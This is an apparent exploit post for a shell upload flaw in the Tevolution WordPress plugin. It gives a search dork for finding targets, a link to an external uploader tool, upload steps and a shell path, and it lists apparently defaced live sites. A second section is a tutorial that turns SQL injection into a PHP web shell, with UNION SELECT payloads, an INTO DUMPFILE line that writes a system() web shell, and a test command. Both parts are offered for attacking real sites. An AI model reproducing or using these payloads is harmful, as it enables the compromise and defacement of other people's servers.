Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability

######################
# Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector
# Vendor Homepage : https://templatic.com/
# version : 2.3.1
# Tools by @MasterZombie :Shell Uploader:https://userscloud.com/eqdkxph1lmwt
######################
# [+] DESCRIPTION :
######################
# [+] The Tevolution WordPress plugin enables advanced functionality in our themes.
# [+] Some of the features it enables include custom post types, monetization options, custom fields…
# [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below.
# [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
######################
# [+] USAGE :
######################
# 1.- Download Wordpress Tevolution Plugin Arbitrary Shell Uploader:https://userscloud.com/eqdkxph1lmwt
# 2.- Use Dork and Choose One Of the Website
# 3.- Edit The Uploader
# 4.- Upload Your File using Tamperdata : shell.php.jpg or shell.php.txt
######################
# [+] Dev!l Path :
######################
# http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/zombie.php
######################
# [+] Live Demo :
######################
# http://guiagronicaragua.com
# http://eventsinsuriname.com
http://localhoneymarket.2base.in/PakistanZindabad.html
http://www.zone-h.org/mirror/id/26679997
http://demo-uat.com/
http://www.zone-h.org/mirror/id/26679960 

Read More

SQLi to PHP Shell Upload

Salam From MasterZombie

THis is just a little tip on what you can do if your SQLi vulnerable site doesn't have valuable information in the database.

I am not going to go too deep into every single move but if you have basic knowledge in Web application hacking I think you will understand what I am doing.

First we have our SQL Injection vulnerable site:

Code:

www.target.com/index.php?id=-1 union select 1,2,3--

Now we would like to know the directory we are currently in, we have a great command for this:

Code:

www.target.com/index.php?id=-1 union select 1,2,@@datadir--

Ah, splending, it outputs: /var/www/html/

Now, what we would like to do is try to save a file on the server, like this:

Code:

www.target.com/index.php?id=-1 union select null,null,'test' INTO OUTFILE '/var/www/html/test.txt'--

To check if this worked, we would go to http://www.target.com/test.txt

If you see a empty document with only the word "test" printed on the screen, then we are good to go.


As for the actual fun, we are now going to upload a simple PHP shell on our target:

Code:

www.target.com/index.php?id=-1 union+select+null,null,'<?php%20@system($_REQUEST["cmd"]);%20?>'+INTO+DUMPFILE+'/var/www/html/shell.php'--

and now we try if the shell works by visiting and choose a command to execute:

Code:

www.target.com/shell.php?cmd=uname -a

You know the deal, if it returns something like:

"Linux target 2.6.18-blablabla #1 SMP Fri Dec 17 13:37:00 2010 i686 athlon i1337 GNU/Linux"

Then it means it worked. 

Read More